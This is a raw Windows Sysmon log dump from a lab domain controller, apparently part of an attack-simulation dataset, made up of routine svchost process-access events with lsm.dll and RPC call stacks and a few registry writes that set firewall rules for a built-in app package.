13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.664{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.649{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|M=microsoft.windows.secondarytileexperience_cw5n1h2txyewy|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|D=C:\Windows\SystemApps\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\|PFN=Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy| 13241300x800000000000000011014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.633{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{874BE917-5739-43C8-9422-782DE9E26DDC}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 13241300x800000000000000011013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.633{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{5A4FE045-114E-4084-8E15-055D0C7B5F65}v2.26|Action=Block|Active=TRUE|Dir=In|Name=SecondaryTileExperience|Desc=SecondaryTileExperience|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2572118008-3077471215-3128327636-2598586217-811314952-2132569887-2279274531|EmbedCtxt=SecondaryTileExperience| 10341000x800000000000000011012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 